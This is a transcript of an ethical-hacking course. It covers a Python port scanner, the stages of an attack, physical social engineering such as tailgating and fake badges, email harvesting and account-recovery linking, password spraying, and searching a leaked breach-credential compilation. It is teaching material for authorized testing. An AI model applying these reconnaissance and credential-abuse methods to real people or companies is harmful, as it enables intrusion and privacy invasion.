this in a little bit so let's go ahead and delete these and we're just going to put something like 50 to 85 and i'll clarify why we're doing that in just a second so on top of this let's add in some familiar language we're going to say s equals socket dot socket and then socket dot af underscore inec comma socket dot sock stream remember afi net is ipv4 sock stream is our port so we're going to say socket dot set default timeout to 1. why are we doing this this is going to attempt to connect to a port if that port is not connectable it's going to wait one second and then it's going to move on that way we're not sitting there forever trying to make a connection to a port we set the timeout ourselves so we're also going to store a result so the result is going to be s dot connect underscore ex and it's going to be target comma port so why are we doing this well when we do this connect underscore ex right it returns an error indicator so i'm gonna put returns an error indicator if a port is open the result back is going to be zero if a port is not open it's going to throw an error which is going to trigger a one so let's think that through if result is equal to zero then we're going to go ahead and just print out that this port is open we'll throw this in here this time for a placeholder instead we'll say is open and we'll do format port and then one more thing i'll close it out and we'll walk through this one more time so that it all makes sense okay so then we're closing the connection okay so we've got this try statement let's walk through it one more time we've got a for loop here remember four is just an iterate we're going through an iterate we're going through 450 in so we're defining a port right in this range so 50 51 52 all the way up to 85. 
we're going to repeat this whole process we're going to establish our variable s which we did in the socket video the previous video right we're just declaring hey i know i'm going to want to connect to ipv4 and a port when i do make that connection i want that default timeout to be one second okay so then i'm going to store inside of a variable of a result i'm going to say let's connect to the target which we've already established as cisarg v1 and the port which is our iterate here in our loop and if that port is open it's going to return 0. if it's not open it's going to return 1. so if that result is zero go ahead and print out that that port is open close the connection and then we're going to go back and try to establish another connection with por er with yeah port number 51 52 53 we'll loop through all this until we make it all the way through 85 okay so it's just one big loop that we're doing now we need to throw in a few exceptions to make this code really work so here's an exception exception keyboard interrupt so if you've been using linux for a little bit now you should know something like control c is a keyboard interrupt so if we want to interrupt the scan we need to define that there is an interruption here so i'm just going to put in something like exiting program okay and we're going to say when that happens when there is a keyboard interrupt we're going to say sys exit that allows for that clean exit okay there's another exception that could be occurred here right so we're going to say socket.gai air and we're going to say print hostname could not be resolved so if we can't resolve the hostname dns is failing us we're just going to go ahead and exit out and then one more what if we can't make the connection to the address in general well that's what's called a socket error so we're going to say socket.air and we're going to print out couldn't get if i could type it couldn't connect to server and then we're also going to exit this so we'll say 
sys.exit so i'll give you a little bit of time to catch up on this script if you're behind i was typing fast and talking as well so one more walk through we're going to do our for loop through these specific ports and then we're going to go ahead and have some exceptions so we're going to try these with exceptions here if we hit control c we want to exit the program if there's no hostname resolution we want to exit the program if we can't connect to the ip address that we specify we want to exit the program so we need to build in these exits and these are that this is that thinking logically that i talked about uh earlier in earlier videos right that we it wouldn't hurt to build this out and then just think logically and i will be the first person to tell you that when i build a script out and i write it it's always terrible first times always terrible tenth time still probably pretty terrible you have to start thinking of things logically like you might not define an if statement at the beginning right you might have to think through that because you might need one argument or two arguments or three arguments and you don't know so maybe this doesn't look like this and it doesn't look like the pretty banner in here either and you just start with this for loop and then you realize well maybe i should make that a try statement because what if the user wants to exit or there's no connection for a host name or there's no connection to the server how do we get out of that or else we're just going to be stuck in this for loop until it's done but if we get into one of these air situations it's gonna get weird right so and then you start thinking through okay well i know my argument so let me go add in a statement at the top so the user knows how to use it and then maybe i'll put a pretty banner in there when it's all said and done and it starts to really you know design itself now before we run this let's talk about why this isn't great this is going to sit here and run 
through one port at a time for a second of a timeout and then reiterate this is going to take a little bit to run through these little ports now when we get into scanning you're going to see that there are tools out there designed that do it much better much more efficiently and much faster this is not the best way there is something that we could do called threading now threading would take the process and run multiple processes at once for us and allow us to scan a lot of ports at once that would be a potential idea here and there's just improvements that we can do you know some of the things that we thought about already like the the socket get host by hostname you might not have thought about that in your first iteration you might just say hey i want to just put it to ipv4 and what happens if you know we supply an argument and the argument is something like a mixed bunch of numbers now it could be like one five two and then you got letters and somebody mistyped or or what if you give you know an ip address that doesn't exist something like this or you know maybe like 256 dot or 257 or something you know that that isn't possible how is that built in how are we going to prevent that in our script right now not that big of a deal we're writing this for ourselves so you know it's not it doesn't have to be perfect but if we write this for somebody else we go put this on github we kind of want all those errors to be handled and that's where these exceptions come into play and these if statements at the beginning come into play as well so we can handle those errors and those exceptions and we can really start thinking logically on how an end user might fat finger something or break a program or do something even maliciously possibly so there are ways around this and we'll talk about it as well when we get into a bash script that i wrote later on in the course and we can kind of look at how that was written and how it strips out some arguments and prevent some human 
error but we'll get to that later so let's go ahead and actually save this now we've got our scanners scanner script and we're going to go ahead and run it so i'm going to run this and i'm going to run this against my router so my suggestion to you is to do the same or do it to a machine that you know is in your network and has a port open why am i choosing my router in this specific range now my router should have port 53 open because of dns and it should have port 80 open because i need to access the web interface on it so i'm going to go ahead and run this and i have a typo so i have something called soccer here i sure do if you caught that originally good job you knew i was gonna mess up let's try it one more time and there you go so it just ran through it really fast said port 53 is open port 80 is open and immediately you know it knew it knew so it did its job it went out there and it found port 53 and port 80 which is what i was expecting hopefully yours did the same now i could back this off to one through you know 65 535 and another thing we can do if you want to see the speed let's say 65 535 i am going to keyboard interrupt this but we can print out something along the lines of checking port and then we'll do something like this okay and then we say dot format and then port so when we save this and we run it let's take a look now so it's checking through all these ports it's going kind of fast but look it's it's finding ports but this isn't pretty right we wouldn't want this we only wanted to say when the ports open but it's taking some time um we're on port 20 000 of 65 000 so on top of you know just being being a little bit annoying it's uh it's really you know throwing our screen into 20 000 lines now so the only reason i would put a statement in here like this is if i was doing a couple numbers and i wanted to see like if we go back to 50 and to 80 we'll do 81. 
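Here is the scanner the video builds, written out as an added example rather than the course's own scanner.py. The argument check, socket.gethostbyname, the banner, the connect_ex loop and the three except clauses follow what is described above; on top of that it adds the improvements the video only mentions: a thread pool so many ports are probed at once, an optional port-range argument, rejecting malformed addresses such as 256.1.1.1 before they go anywhere near DNS, and a summary line at the end. The function names resolve_target, parse_port_range, check_port and scan_ports are this example's own assumptions, not names from the course.

```python
#!/usr/bin/env python3
# scanner.py: the course's port scanner rewritten as an added example with the
# improvements the video mentions (threading, input validation, a summary line).
# Function names below are this example's own, not the course's.
import ipaddress
import socket
import sys
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime

DEFAULT_TIMEOUT = 1.0  # seconds to wait on a port that never answers
WORKERS = 100          # how many ports are probed at the same time


def resolve_target(name):
    """Return the IPv4 address for an IP literal or a hostname."""
    try:
        return str(ipaddress.IPv4Address(name))
    except ValueError:
        pass
    # Dotted digits that are not a valid address (256.1.1.1, 1.2.3): reject
    # the typo here instead of handing it to DNS.
    if name.replace(".", "").isdigit():
        raise ValueError("invalid IPv4 address: {}".format(name))
    return socket.gethostbyname(name)  # raises socket.gaierror if DNS fails


def parse_port_range(spec):
    """'50-85' -> range(50, 86); '80' -> range(80, 81). Ports must be 1..65535."""
    low, _, high = spec.partition("-")
    low = int(low)
    high = int(high) if high else low
    if not 1 <= low <= high <= 65535:
        raise ValueError("port range must be within 1-65535: {}".format(spec))
    return range(low, high + 1)


def check_port(target, port, timeout=DEFAULT_TIMEOUT):
    """True if a TCP connect to target:port succeeds within the timeout.
    connect_ex returns 0 on success and an errno (not always 1) on failure."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)  # per-socket timeout instead of setdefaulttimeout
        return s.connect_ex((target, port)) == 0


def scan_ports(target, ports, timeout=DEFAULT_TIMEOUT, workers=WORKERS):
    """Probe the ports with a thread pool and return the open ones, sorted."""
    ports = list(ports)
    open_ports = []
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # One batch of `workers` ports at a time, so a Ctrl+C only has to wait
        # for the batch in flight (at most one timeout) before the pool exits.
        for i in range(0, len(ports), workers):
            batch = ports[i:i + workers]
            results = pool.map(lambda p: check_port(target, p, timeout), batch)
            open_ports.extend(p for p, is_open in zip(batch, results) if is_open)
    return sorted(open_ports)


def main(argv):
    if len(argv) not in (2, 3):
        print("Invalid amount of arguments")
        print("Syntax: python3 scanner.py <ip or hostname> [port-range, e.g. 50-85]")
        return 2
    try:
        target = resolve_target(argv[1])
        ports = parse_port_range(argv[2]) if len(argv) == 3 else range(1, 65536)
        started = datetime.now()
        print("-" * 50)
        print("Scanning target " + target)
        print("Time started: " + str(started))
        print("-" * 50)
        open_ports = scan_ports(target, ports)
        for port in open_ports:
            print("Port {} is open".format(port))
        print("Scanned {} ports in {}, {} open".format(
            len(ports), datetime.now() - started, len(open_ports)))
        return 0
    except KeyboardInterrupt:
        print("\nExiting program")
        return 1
    except ValueError as err:
        print("Invalid input: {}".format(err))
        return 1
    except socket.gaierror:  # before socket.error: gaierror is a subclass of it
        print("Hostname could not be resolved")
        return 1
    except socket.error:
        print("Couldn't connect to server")
        return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as python3 scanner.py 192.168.1.1 50-85 to reproduce the video's range; with only a host it walks all 65535 ports, which the thread pool makes tolerable. Note that connect_ex hands back an errno value rather than always a 1, so the open check compares against 0 (as the video's script does) instead of looking for a 1.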
If we do this, it's a good way to see how fast your scanner is running. If it's running, it's a good way to have print statements in there if you might see any errors, and you can see it ran through 80 pretty fast and found 53 and 80 open. So I would delete this. If you want to do a full port scan again, you could do one through 65535. Go ahead and save that. Sorry if you heard my dog barking; it's really windy tonight. So we're gonna go ahead and do it one more time, and now it should be a little prettier, and then as the ports are open it'll print out, and if you want to get fancier you could have a little thing at the bottom that says, hey, this took this long to scan, here's how many ports are open, et cetera. So this is finding all the ports, so I'm going to go ahead and Ctrl+C, and you can see now "Exiting program": our keyboard interrupt worked. So everything is working really, really well, and that is it.

So that's it for the Python series, and hopefully this all made sense, this all built upon itself. You know, the goal here again is not to be an expert in Python; the goal here is to get you interested in Python, to get you seeing that it's really not that bad, and in about an hour and a half to two hours' time we started with nothing and built out a nice script that, you know, just built lesson upon lesson until we got here. So we're going to move on and actually get into the hacking. You have successfully completed all of your foundational courses: we've got the Linux down, we've got the networking down, we've got the Python down, and now we're ready to get into the good stuff. So I'm very excited to do the hacking; this is our strong suit, this is our bread and butter, and we're really going to knock it out of the park. So I will catch you over in the next video when we start learning about hacking.

Okay, before we get hands-on, I have to give you a little bit of death by PowerPoint, but it's for good reason. So we need to introduce the five stages of ethical hacking. These are the five stages that you will go through on every assessment. So before we do that, let's first make a big note: from here on we are moving into the ethical hacking portion of our course. We are going to learn malicious things. Please only use the information learned in this course for ethical purposes. Do not attack your neighbors; do not attack anybody you do not have explicit permission to attack. You can and will get into trouble for doing that. So with that out of the way, let's talk briefly about the five stages of ethical hacking.

So we start up at the top, and we actually start with what is called reconnaissance. The stage is also known as information gathering, and there are two different types: there's active and passive. Now passive is, say, like going out to Google and searching for somebody. Say you're given a client and you want to look at their Google, you want to look at LinkedIn; you might be looking for, I don't know, a picture of their badge, or an employee's name, or maybe an employee's Twitter page. That's all passive; you're not actually going out to the company's website and doing anything active against it. Now active reconnaissance kind of falls into place with the second phase, which is scanning and enumeration. Now that is active; that is where we go out and we take tools such as Nmap and Nessus and Nikto (if you've never heard of any of those, that's fine) and we scan actively against a client. Now what we're looking for are open ports, vulnerabilities, different items, and with what returns on these results when we do this scanning, we also perform what is called enumeration. Enumeration is just looking at items and digging into them to see if we can find anything of value. Say that there is a web server running on port 80: we see port 80 is open and it's running something like Apache 1.2, which would be really, really outdated. We would go out to Google and we would say, Google, do you know if Apache 1.2 has any exploits for it? And we would do research; that's the enumeration portion of it.

So once we do our information gathering, we do our scanning and enumeration, then we move into the gaining access portion. This is also known as exploitation. We will run an exploit against the client, or against the vulnerable service, or whatever it may be, to try to gain access into a machine or into a network, into an environment, etc. Once we have that access, the process starts to repeat: we do scanning and enumeration again, and we also want to maintain that access, right? So if we were to get kicked out, okay, or a user shuts down their computer, how do we maintain that access so when they turn their computer back on we still have access to it? And then lastly there is the covering tracks. You want to delete any logs that you may leave behind; you want to delete any kind of malware that you upload, which is more important as a pen tester; any accounts that you create for any reason, you want to delete those as well. You really just want to clean up; it's a good way of putting it. Covering tracks is the more hacker way of putting it, but as a penetration tester you really just want to clean up. So we're going to go heavily through steps one through three in this course; we'll also cover four and five briefly. But the process and methodology never changes, regardless if you're doing network, if you're doing web app, or if you're doing a different type of assessment; it's all similar in these five stages of hacking. The tools might change, the attack methods might change, but the overall methodology is always the same. So that's how we're also going to structure this course. We're going to go in first and we're going to talk about information gathering and reconnaissance, then we're going to move into scanning and enumeration, and then we'll start with exploitation and do that repeatedly till we get it inside of our heads and it feels almost second nature, right? Once we have all that done, we'll do some practice boxes, you know, give it a go, see how we do. We'll move into the
internal side of things with Active Directory, we'll start working with our web applications and our wireless, and we will touch on the maintaining access and covering tracks. But you're going to see this methodology over and over, and you might also get this question on an interview, you know, to describe the five stages, so it's important to know these. It's just something that every ethical hacker can rattle off pretty quickly, so have this written down, think about it, keep your wheels spinning, and let's go ahead and move on to our first section, which is going to be information gathering slash reconnaissance: learn some cool tools, some Google-fu, and just what kind of information we can actually gather on a potential client.

So in this section we are going to be talking about information gathering, and all the information gathering we're going to do in this section is going to be passive, so I'm calling this passive recon or passive reconnaissance. I wanted to give a brief overview of what we're going to be covering and talk about some high-level topics before we get into the weeds and really dive into our target. So let's talk about the different types of passive recon. So on the physical or social sides (physical meaning actually going on site and maybe doing a physical engagement, or the social engineering aspect of maybe doing a phishing assessment, or even including it in a physical engagement, or a vishing assessment), just gathering this information from the physical/social aspect is incredibly useful. So we have location information, so we might utilize something like satellite images, or often we'll go on site and do drone reconnaissance, where we fly a drone around and try to gain information, and what we're really after with these images of this drone recon is we're trying to find out, hey, what does the building layout look like? Are there badge readers? Are there break areas? Does security exist? Do they have somebody posted up front? Can you just walk right in the door? What does their fencing look like? Are there areas where they're just leaving the doors propped open? Where do people go out and smoke in these break areas? Because those are a good place to just walk up to somebody, light up a cigarette even if you don't smoke, and just start a conversation and then tailgate right in with them into the building.

Now the other aspect of this is the job information. So we might be looking for employees online; I might want to know somebody's name, job title, phone number, who their manager is. I try to get a good idea of what people look like, so if I see them on site I have a good idea who they are. I also look for pictures, so I cannot tell you how many times a badge photo is posted on LinkedIn or somebody posted on Twitter. You could see all the memes out there about people posting their photos at work, and it's bad; it happens all the time, I see it to this day. So we're looking for badge photos, I'm looking for desk photos, computer photos. I had a situation once where somebody took a picture of her watching a game at work; she was watching a basketball game at work, and the basketball game was on her computer, and on her screen there it showed all the different tools that they utilized at work. She had a work application open in this photo, there was a desk in the background, you can see different things, and it just gives us information, and that's really what we're after: what kind of information can we gather? Now this course is not a course on physical or social, so I kind of wanted to give a high level of what to expect. We won't really be doing a whole lot of this in this course with this type of information gathering, but these are the things that you should be looking for. So if you are tasked with a physical assessment, do go out there and look for satellite images, try to get a good feel of the building layout, and also try to get a feel for who the employees are, who maybe the IT manager is, in case you're going to say, you know, I work for IT; they might ask you who your manager is, you might need to know those names. And of course look for pictures; if you can find a good badge photo and what that looks like, you can make a fake badge, go on site, and you'll be way more passable with that badge, but sometimes they don't even look; it could be drawn in crayon.

So from there let's go ahead and talk about what we will be doing a lot of, which is the web and host. So when you get a web or a host assessment, the first thing you really should do is what is called target validation. So we're going to be targeting something on Bugcrowd; we're not really going to focus on this, but what we're going to do in the real world is we would validate the target. Now there are situations where a client will give you an IP address or a website and they might fudge it, right? They might accidentally fat-finger it, put the wrong number, put the wrong letter in the website, and then guess what, you're off attacking somebody else's website. And if you are a podcast listener, there's a good Darknet Diaries episode on this; if you don't listen to Darknet Diaries, go check it out. There's a great episode with a guy named Rob Fuller, aka mubix, and he talks about getting the wrong IP address on an assessment and attacking the wrong people and actually gaining access to that machine, which is a really, really big screw-up on both parts, right? So you should always validate your targets. On top of this, when we're doing our web and our host, on the website we're going to look for subdomains, and we'll talk more about that as we get into it, but we can do that with Google, we can do that with Nmap, Sublist3r; there's so many different tools that we can use, and we'll cover some of the tools and how to do it, get a little deep into that as well, especially as we get into the web side of things. There's fingerprinting: we need to know what's running on a website or what's running on a host. What kind of services are out there? Are they running a web server? What's that web server, is it IIS, is it Apache, what version is it, right? What ports are open on their machines? Oh, they have FTP open; what version of FTP is open? So we need to fingerprint machines and kind of understand. But on the passive side we're not touching any machine, right? So we're not going to be doing much scanning against a host; we just have to utilize what kind of information might already be out there. So if we go out to a website, it's on the border of active, but as long as we're not scanning it, in my book it's still passive. So we will cover some of the passive/active side in this section, and then when we get into scanning we'll get way more active with it.

Lastly, we're going to hit heavy, especially in the beginning, on data breaches. Data breaches are the most common way, when we're doing an external assessment, that we get into networks, absolutely, by far. When we talk about data breaches, we're talking about breach incidents from the past that have leaked data. Again, these are like Home Depot, Equifax, LinkedIn, all kinds of breaches that are out there that have had credentials dumped, and then those credentials become available to us eventually, and we try to utilize those to gain access, or at least utilize the usernames to gain access. Nowadays, most of the time there's not going to be an easy "just scan, find something vulnerable and exploit it" on the external side of the house, so we're looking for these data breaches and this information that we can gather, and this is why information gathering, and then enumeration and scanning, are most important by far. The better scanning and enumeration that you can do, and the better information gathering you can do, the better hacker you're going to be and the better you're going to be at your job. So take these first two sections really seriously. So we're going to start in with identifying what our target's going to be for this part of the section, and then we're going to go ahead and start talking about data breaches and why they're
important and go deeper into that, and then we'll go off some of these tools that you see here on this list and really dive into those. So I will look forward to seeing you in the next video when we identify our target and get some information gathering started.

All right, before we begin doing our reconnaissance we have to establish a client to attack. So for this course we're going to be utilizing a client out of Bugcrowd. If you've never heard of Bugcrowd, Bugcrowd is a public bug bounty program. What that means is there are programs on the website that will allow you to attack them, and if you find a bug against the program, you're able to submit it and potentially get money for it. So you are able to hack these programs publicly, as they are part of this program. Now the program we're going to be attacking is Tesla, so Tesla is part of Bugcrowd. Now please do note, please double-check when you're watching this course, as some time may have passed: Tesla might no longer be part of this bug bounty program, so it's very critical to make sure that you are still within scope before you attack. If for some reason Tesla is no longer in scope, just go ahead and pick a new client and do information gathering on them. You don't have to pick Tesla when we're doing this; you can just do it to follow along with me, but you're also welcome to pick any program you want. So if you go to bugcrowd.com and we go to Programs, I will show you where Tesla exists. Now you can see here that they have all different types of programs in here, and if I were to scroll down continuously I could find more and more and more. There are hundreds of programs involved, all kinds of names: DigitalOcean, Okta, really big names, Pinterest, Atlassian; anything that you can imagine probably has a bug program if it's reputable. Okay, any of the big names most likely have a bug program, especially if they're reputable. So here you can see what's based on reward, what's based on charity, and what's based on points only. That's how the bug bounties are rewarded: some of them are not all cash, some of them are just for points and for kudos, and the other ones are for charity. I'm gonna go ahead and just search Tesla, and when I do that you can see here that Tesla comes up.

Now this is your first lesson in rules of engagement, and we're going to talk about rules of engagement later, but it's super important to read the program details that you see here, and what we really need to do is we need to scroll through and make sure that we stay in scope when we're doing this. So we have a wildcard here, so this means that any subdomain inside of tesla.com is fair game: tesla.cn, teslamotors, etc. What is more important is that we stay within this out of scope, so we don't want to attack shop.eu.teslamotors.com or energysupport.tesla.com; it says you can report vulnerabilities to bug bounty for this one. Any domains from acquisitions, messages, Maxwell; so we have to stay within Tesla, and there's a few more sites. We're not going to worry too much about that; when we get into the web app portion of the course we're going to talk about way more detail on enumerating web applications and go into that. So for now what we're going to do is we're just going to focus on information gathering: what kind of information can we gather from this client? So again, I'm setting my target to Tesla; if you pick another client, just make sure you stay in scope of that client. So from here we're going to move on to our first video and get our information gathering started.

Welcome to the email OSINT section. We're going to talk about discovering email addresses, and this is something that I do on a weekly basis, so I'm going to show you the most common tools that I use to actually look up email addresses and try to find people, and what you can do to kind of verify email addresses. So I'll show you some of my favorite tools and concepts, and this is something that I do not only for OSINT and doing it for investigative
type work, but think about sales: if I'm trying to find a lead, or I'm trying to find multiple leads within an organization, I have to figure out where the emails are, who the people I'm trying to email are. So maybe I'll Google them and say, who is the CSO or chief information security officer for this company? And I might find that it's Bob Jones, and we go look up Bob Jones and we say, okay, well, how do I get Bob Jones' contact information? Can I find it via Google? Maybe; maybe it's out there in the public, but maybe we have to dig a little deeper, maybe we have to kind of do some guesstimation and see if we can figure it out. So that's what we're going to do today, is look at the email address formats and try to determine if we can find some emails.

So let's go ahead and move over to the Kali Linux machine that I've got, and the first website is one of my favorites, so hunter.io. You just come to hunter.io, you get like 50 or 100 free searches a month, I don't remember what it is, it's a fair amount. You can come here and basically just type in a company name, so like say I want to type in TCM Security, tcm sec, and you can see TCM Security here. We get one result on the email address, so we'll click it and see what happens here, and looks like we have like an info@tcm-sec.com. It tells us, hey, there's five sources that identify this, so we see tcm-sec.com, there's an about, blogs; this is where they're finding it. Okay, a better example, maybe something that has more users, like Tesla. Tesla has 468 users. If we come in here and we look, well, we can see that they have a pattern identified here, so the pattern they're identifying is first initial last name at tesla.com, and that's really what we want to see, and then we can gather email addresses here if we want. But say like we knew Bob Jones, again going back to that example, Bob Jones; so maybe Bob Jones works at Tesla, maybe his email would be bjones@tesla.com. So it's something to think about. Now we can sign up and get actual information here. You should be able to sign up with a Gmail account; sometimes this does not work depending on the country that you are in, so be cognizant, you might have to use a different email address, but I just tried signing up with a Gmail account that I have on here and it worked just fine. So I'm going to go ahead and try to log in; I'm going to sign in with Google with what's already here, and just now I'm logged in. So we can go back now and try searching Tesla again; you'll see that the results actually come back. So we get information here. Now, let me make this a little bit bigger. We get information as to, okay, here's the vice president, this is the vice president's email address, project development manager. Maybe you want to talk to somebody in human resources, so you can click here and go to Human Resources, and then here are the different human resources emails that are here, and then the sources that they found these email addresses. So this isn't a particular person in HR, but it's still human resources email addresses. So this looks like it's probably for Hong Kong, this is for Berlin, this is Gigafactory, so they have different email addresses based on where they are. Now if you looked up TCM Security here, you're really not going to find much on us, because we don't have a ton of email addresses out there, but I think that we can find more in other ways. Now, so we only get so many uses here; we'll just keep thinking about this as we move forward. So hunter.io, great, great resource. They have plug-ins if you want them; I think it's a fantastic place to look.

phonebook.cz is the next resource I want to show you. This one is fantastic. Let's start with tcm-sec.com and see, so we're going to tcm-sec.com and we're going to search email addresses here. So they do domains and URLs as well, which I think is awesome, but let's just search for email addresses, see if anything comes back. No, no results; okay, that's okay. Let's try Tesla and see what comes back there. Okay, a lot more. So we get quite a few email addresses; we can see Elon Musk all over the place, we've got elon-musk, elon, we've got emusk over here, and we get a ton of emails, look at this. So what's nice about this is we can sit here and try to identify what the possible email addresses are. So again, first initial last name looks like it's showing up quite a bit; outside of maybe like the Elon Musks of the world, we're getting a bunch of mostly first initial last names in here, so I think that's pretty spot on with this. The other thing that we can do is we could utilize this list. Say we're trying to do something called credential stuffing, which we'll talk about in the next section actually, when we talk about breached credentials, but say we're trying to gather a bunch of usernames and test and see if we can log in with those usernames anywhere, or maybe password spraying, not so much the credential stuffing but password spraying, where we take all these usernames and we just throw it at a login form and say, hey, Summer2020!, you know, see if that logs into any of these accounts, and you would be surprised, it happens quite a bit. So, you know, this is valuable information even if we don't know exactly; maybe we're not just hunting for one email, maybe we're hunting for an entire domain. This is a great way to get free entire domains with a quick copy and paste capability. Like we have the Tesla here; we can export the CSV from hunter.io, but you only get so many results that you can export into a CSV. Here you get a bunch; there's no guarantee these are all valid, but it's still information; information is what we want. This is all we're trying to gather, is as much information as possible. So these are all potential email addresses for tesla.com. I think it's a great, great resource.

Now we could also use something like Voila Norbert. Now this one you can get 50 more leads for free; I'm not going to show you, it's the same kind of deal as hunter.io. They're showing you how to utilize it here; basically you can just search for people and see, to try to find their email addresses. There is one I want to show you that I do use and I have quite a bit of success with, and that is called Clearbit, and Clearbit has to be used in Chrome. So I'm going to bring up this here. Clearbit has to be used in Chrome, so you can download the Chrome extension for Clearbit, and all you have to do is go to Google; let me log in really quick, and then I'm going to just select the free account. We get so many searches, 100 emails a month. So basically you're going to search for Clearbit Connect, and you would just say, hey, Clearbit Connect (I'll put a link down below, by the way), but Clearbit Connect is awesome; you'll see why here in a second once I authorize this. Okay, we're going to come down here, acknowledge, probably give out our firstborn, and then now we're going to say, hey, I want to find emails, and here's all different kinds of things that we can sit here and search for. You can see TCM Security's in here; these are some searches that I've done. These aren't any clients of mine; these are just searches that I've done in the past, maybe looking for information or looking for possible leads or anything. So if I come in here and I say, hey, I want to look for TCM Security, you could type that in; I'm going to just click on TCM Security, and look what it discovered that the others didn't: it discovered me, okay, and if I click on me, look, it says heath@tcm-sec.com, where
Where did that come from? And then look, it has my LinkedIn right here as well. That's amazing, that's awesome, and it says here you can email Heath, just click this button. Then it's also got Rizwan; Rizwan's on my sales team. Look, it's got rizwan@tcm-sec.com. What does that tell you? That tells you that we're using a first-name basis for our email addresses. It's awesome.

Now let's come in here and maybe look at Tesla. Let's try Tesla one more time; maybe we're looking for the CSO of Tesla. Tesla has a CSO. You could come in here and, look, Elon Musk is right here, obviously CEO, but you could come in here and maybe go by role. They have different roles in here, so CEO... let's see if we can find any sort of CSO. I don't see one, but I do see information technology, so maybe we can find somebody in the information technology department or IT department. And here we go, we've got quite a few IT people. Here's a CIO; this could be somebody of interest that we might want to reach out to, and we could just scroll through this list and find people. So say we want to reach out to the CIO: just click on this, and we get first initial, last name just like we thought we would, we get this person's LinkedIn page, we get their location, website. This is awesome, awesome, awesome.

So I typically will start with a Google search if I'm trying to hunt something down. I will say who is in this role at this company, if I'm looking for a specific person at a company. Then I will go to phonebook.cz or hunter.io, try to identify the formatting of the email, and then try to find that person or guesstimate that. Once we get to that point, I try not to burn through these Clearbit searches unless I need to, but Clearbit is very good at identifying this. Once we get to that point, we can take this email (say like this email, or we'll even try a different email, I'll show you a couple) and we can go try to verify it. There is a website called Email Hippo; you can go to tools.vera and all you have to do is type in an email address here. Sometimes you can get false positives, whether they're good or bad. Here I typed in this email address a couple of times and just got a bad result; this is an email address that does not exist. Now let's try an email address that we saw, info@tcm-sec.com, and see if it works. The result is okay, so it says, yeah, this email address works. So we're verifying that this is up. Say that you get somebody and you see that they have a potential email address: you can come here and try to verify it first and see if it works before you go fire off an email. Or don't; you don't have to fire off an email, you don't have to do anything or interact. This is the benefit. If you're from a sales perspective and you're doing OSINT here, this is the benefit: not having to email, waste your time and get it rejected. You can come in here and just validate. If you're doing an investigation, you don't want to interact with the person or company that you're investigating; you want to come in here and just verify without any interaction, and this is the way to do it.

Same thing with this website here, email-checker.net/validate. Say, hey, checking the email, I put the same email address here and you can see it says bad. We could try again with info@tcm-sec.com and see if that works, and it says okay. So again, this is doing a great job. There are possibilities of false positives, and there are only so many searches that you can do per month on these. I do believe they have APIs, which is nice if you want to automate this or script this out, but I think this is fantastic, this is great stuff.

Now there are plenty of other ways to verify email addresses. In the next section we'll talk about that even more as we talk about breach data, because if somebody shows up in a data breach, guess what, that email address has been used in the past. If you look at something like Have I Been Pwned, which we'll talk about in the next section, and they show up, guess what, that person's email address has existed. So we're trying to verify if an email address exists, who that address might belong to, etc.

Now this has been more from a business perspective. Some of this hunting down of emails may be more difficult to do if you're trying to find a specific individual. That's where breach data comes into play in a lot of this research, and what I'm going to show you in the next section is we'll try to hunt down individuals with maybe loose pieces of information like a name or a username or something along those lines. Breach data can come in handy very, very well. So this is kind of scratching the surface.

Now there's one last thing I want to show you, one last little tip and trick: do not underestimate forgot passwords. Do not underestimate them. Let's go to Google, for example. Right now I am logging in under an account that is "please don't hack me sir plz", so it's pleasedonthackmesirplz, I do believe. I'm going to go ahead and try hitting next on that. Okay, so first of all it said, hey, welcome. What does this mean? This means that we have a valid account here. That's great; this is validating that this Gmail account exists. Here's something else: we can use this to tie to potentially another account, or to help validate. Say we know that this email belongs to somebody that's harassing somebody else; we don't know who this person is, they're using this spoofed email, but maybe we have a hunch, or maybe we don't, maybe we just want to try to get more data. You can come to forgot password and it's going to say, what's the last password you remember using? I don't know, let's try another way. You come down here and it says (let me make this bigger) Google will send a verification code to h, and it shows you the rest of the digits here, and then at tc dot, here. That would give you a pretty good indication, if you're tracking who your subject is, that this email could tie to somebody else. Look, this is heath@tcm-sec.com, okay? So this email belongs to me; this is tying back to me. Now you have another point here. So if you knew about this email address, and now you have the link, the connection, to guarantee that this person... this is evidence right here. Say you were doing something, which we'll learn about again in the next section, where you're looking through breach data: you find a username that matches this email address and also matches this email address. But people can reuse usernames; there could be multiple people who use the same username, so you need to verify some link. This would be proof of a link between those, a pretty strong proof if you ask me. If you can say, hey, I identified two email addresses with the same username, I did an account recovery, came in here and saw that this had the same first character and the same first domain name, I think that's a pretty strong correlation. So, things to think about, wheels to be spinning: try to identify email addresses any way possible. We'll cover this more in depth in the next section, and I'm really excited because password hunting is one of my favorite things. So let's go ahead and move on to the next section, where we talk about password OSINT.

Okay, so I would like you to go out to github.com, and once you're there go ahead and just do a forward slash hmaverickadams, h-m-a-v-e-r-i-c-k-adams, and hit enter, and you can see me and my snazzy photo here. But what we're after is I want to show you a tool that I wrote called breach-parse, and we're going to walk through what it does. Go ahead and click on breach-parse and you're going to see a bash script here and a little bit of a description. So you do not need to download this; let me preface with what we're doing here. This magnet link: you're going to need a torrent client, some sort of uTorrent or BitTorrent, and you'll need to download this, and it's something along the lines of 44 gigabytes extracted. It's a huge file, so you don't have to do this; you can just watch and follow along. You are more than welcome to install this on your machine. I'm going to show you what it looks like. So I'm going to go out to my applications and my files here, and I have put this into my opt folder. If you come into opt here, I've got breach-parse, and if you come into this BreachCompilation folder, which is what will download, you're going to see that we have data here. Okay, so this data has a bunch of different data; it's got emails starting with 0, 1, 2, 3, 4, all these different ones. What's living inside of this, if we can display it, is emails and passwords. You see these ones have weird symbols inside the emails, but there's a bunch of emails and passwords in here, like somebody at yahoo.com and their password is 123456. Well, these passwords are coming from credential dumps. We talked about it earlier, thinking about the Equifax or the LinkedIn breach or Home Depot; all these big breaches that happen, credentials get dumped out, and guess what, they show up on the dark web and eventually they show up in these lists. So we utilize these lists, and we've got, if you click into this, just hundreds of files here, and again 44 gigabytes. So what I did was I built a little tool that can search through this data and pull down names. We could take a quick look at the tool and what it does, but basically you just put in the syntax: you search for something like @tesla.com and then you specify tesla.txt, and it's going to search through all of these files for @tesla.com. If you're more interested in the code behind it, you're more than welcome to read the code in here and see if some of the items that we've covered already with the bash scripting and the Python scripting kind of ring a bell.

